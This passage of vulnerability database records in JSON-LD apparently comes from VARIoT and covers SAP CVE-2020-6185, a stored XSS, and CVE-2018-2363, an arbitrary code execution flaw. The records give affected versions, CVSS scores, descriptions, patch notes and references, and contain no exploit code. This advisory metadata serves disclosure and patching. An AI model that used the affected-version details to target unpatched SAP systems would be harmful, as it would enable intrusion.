"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202002-1432",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 2.4,
"vendor": "sap",
"version": "7.40"
},
{
"model": "s\\/4hana",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.50"
},
{
"model": "s\\/4hana",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.54"
},
{
"model": "s\\/4hana",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.51"
},
{
"model": "s\\/4hana",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.53"
},
{
"model": "s\\/4hana",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.52"
},
{
"model": "s/4 hana",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.50"
},
{
"model": "s/4 hana",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.51"
},
{
"model": "s/4 hana",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.52"
},
{
"model": "s/4 hana",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.53"
},
{
"model": "s/4 hana",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.54"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002067"
},
{
"db": "NVD",
"id": "CVE-2020-6185"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-713"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:s\\/4hana:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:s\\/4hana:7.51:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:s\\/4hana:7.52:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:s\\/4hana:7.53:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:s\\/4hana:7.54:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-6185"
}
]
},
"cve": "CVE-2020-6185",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 3.5,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2020-002067",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cna@sap.com",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.4,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "JVNDB-2020-002067",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "Low",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-6185",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cna@sap.com",
"id": "CVE-2020-6185",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2020-002067",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202002-713",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002067"
},
{
"db": "NVD",
"id": "CVE-2020-6185"
},
{
"db": "NVD",
"id": "CVE-2020-6185"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-713"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Under certain conditions ABAP Online Community in SAP NetWeaver (SAP_BASIS version 7.40) and SAP S/4HANA (SAP_BASIS versions 7.50, 7.51, 7.52, 7.53, 7.54), allows an authenticated attacker to store a malicious payload which results in Stored Cross Site Scripting vulnerability. SAP NetWeaver and SAP S/4HANA Exists in a cross-site scripting vulnerability.Information may be obtained and tampered with",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-6185"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-002067"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-6185",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2020-002067",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202002-713",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002067"
},
{
"db": "NVD",
"id": "CVE-2020-6185"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-713"
}
]
},
"id": "VAR-202002-1432",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:56:22.159000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Patch Day - February 2020",
"trust": 0.8,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=537788812"
},
{
"title": "SAP NetWeaver and S/4HANA Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=111181"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002067"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-713"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002067"
},
{
"db": "NVD",
"id": "CVE-2020-6185"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "https://launchpad.support.sap.com/#/notes/2880869"
},
{
"trust": 1.6,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=537788812"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-6185"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-6185"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002067"
},
{
"db": "NVD",
"id": "CVE-2020-6185"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-713"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002067"
},
{
"db": "NVD",
"id": "CVE-2020-6185"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-713"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-03-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-002067"
},
{
"date": "2020-02-12T20:15:14.120000",
"db": "NVD",
"id": "CVE-2020-6185"
},
{
"date": "2020-02-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202002-713"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-03-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-002067"
},
{
"date": "2020-02-19T20:03:06.250000",
"db": "NVD",
"id": "CVE-2020-6185"
},
{
"date": "2020-03-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202002-713"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202002-713"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver and SAP S/4HANA Cross-site scripting vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002067"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202002-713"
}
],
"trust": 0.6
}
}
var-201801-1264
Vulnerability from variot
SAP NetWeaver, SAP BASIS from 7.00 to 7.02, from 7.10 to 7.11, 7.30, 7.31, 7.40, from 7.50 to 7.52, contains code that allows you to execute arbitrary program code of the user's choice. A malicious user can therefore control the behaviour of the system or can potentially escalate privileges by executing malicious code without legitimate credentials. Vendors have confirmed this vulnerability SAP Security Note 2525392 It is released as.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Successful exploits may allow an attacker to inject and run arbitrary code or obtain sensitive information that may aid in further attacks. Failed exploit attempts may result in a denial-of-service condition. SAP Netweaver 7.00 through 7.02, 7.50 through 7.52, 7.10, 7.11, 7.30, 7.31, and 7.40 vulnerable
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201801-1264",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": null
},
{
"model": "business application software integrated solution",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.40"
},
{
"model": "business application software integrated solution",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.30"
},
{
"model": "business application software integrated solution",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.31"
},
{
"model": "business application software integrated solution",
"scope": "gte",
"trust": 1.0,
"vendor": "sap",
"version": "7.10"
},
{
"model": "business application software integrated solution",
"scope": "lte",
"trust": 1.0,
"vendor": "sap",
"version": "7.02"
},
{
"model": "business application software integrated solution",
"scope": "lte",
"trust": 1.0,
"vendor": "sap",
"version": "7.11"
},
{
"model": "business application software integrated solution",
"scope": "gte",
"trust": 1.0,
"vendor": "sap",
"version": "7.00"
},
{
"model": "business application software integrated solution",
"scope": "gte",
"trust": 1.0,
"vendor": "sap",
"version": "7.50"
},
{
"model": "business application software integrated solution",
"scope": "lte",
"trust": 1.0,
"vendor": "sap",
"version": "7.52"
},
{
"model": "basis",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.52"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.11"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "BID",
"id": "102449"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001368"
},
{
"db": "NVD",
"id": "CVE-2018-2363"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-344"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:business_application_software_integrated_solution:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:business_application_software_integrated_solution:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.02",
"versionStartIncluding": "7.00",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:business_application_software_integrated_solution:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:business_application_software_integrated_solution:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.11",
"versionStartIncluding": "7.10",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:business_application_software_integrated_solution:7.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:business_application_software_integrated_solution:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.52",
"versionStartIncluding": "7.50",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2363"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "102449"
}
],
"trust": 0.3
},
"cve": "CVE-2018-2363",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-2363",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-2363",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-2363",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201801-344",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-001368"
},
{
"db": "NVD",
"id": "CVE-2018-2363"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-344"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver, SAP BASIS from 7.00 to 7.02, from 7.10 to 7.11, 7.30, 7.31, 7.40, from 7.50 to 7.52, contains code that allows you to execute arbitrary program code of the user\u0027s choice. A malicious user can therefore control the behaviour of the system or can potentially escalate privileges by executing malicious code without legitimate credentials. Vendors have confirmed this vulnerability SAP Security Note 2525392 It is released as.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. \nSuccessful exploits may allow an attacker to inject and run arbitrary code or obtain sensitive information that may aid in further attacks. Failed exploit attempts may result in a denial-of-service condition. \nSAP Netweaver 7.00 through 7.02, 7.50 through 7.52, 7.10, 7.11, 7.30, 7.31, and 7.40 vulnerable",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2363"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001368"
},
{
"db": "BID",
"id": "102449"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-2363",
"trust": 2.7
},
{
"db": "BID",
"id": "102449",
"trust": 2.1
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001368",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201801-344",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "102449"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001368"
},
{
"db": "NVD",
"id": "CVE-2018-2363"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-344"
}
]
},
"id": "VAR-201801-1264",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:19:16.866000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "January 2018 (2525392)",
"trust": 0.8,
"url": "https://blogs.sap.com/2018/01/09/sap-security-patch-day-january-2018/"
},
{
"title": "SAP NetWeaver Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=77611"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-001368"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-344"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-94",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-001368"
},
{
"db": "NVD",
"id": "CVE-2018-2363"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "https://launchpad.support.sap.com/#/notes/2525392"
},
{
"trust": 1.9,
"url": "https://blogs.sap.com/2018/01/09/sap-security-patch-day-january-2018/"
},
{
"trust": 1.8,
"url": "http://www.securityfocus.com/bid/102449"
},
{
"trust": 1.6,
"url": "https://launchpad.support.sap.com/#/notes/1906212"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-2363"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-2363"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
}
],
"sources": [
{
"db": "BID",
"id": "102449"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001368"
},
{
"db": "NVD",
"id": "CVE-2018-2363"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-344"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "102449"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001368"
},
{
"db": "NVD",
"id": "CVE-2018-2363"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-344"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-01-09T00:00:00",
"db": "BID",
"id": "102449"
},
{
"date": "2018-02-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-001368"
},
{
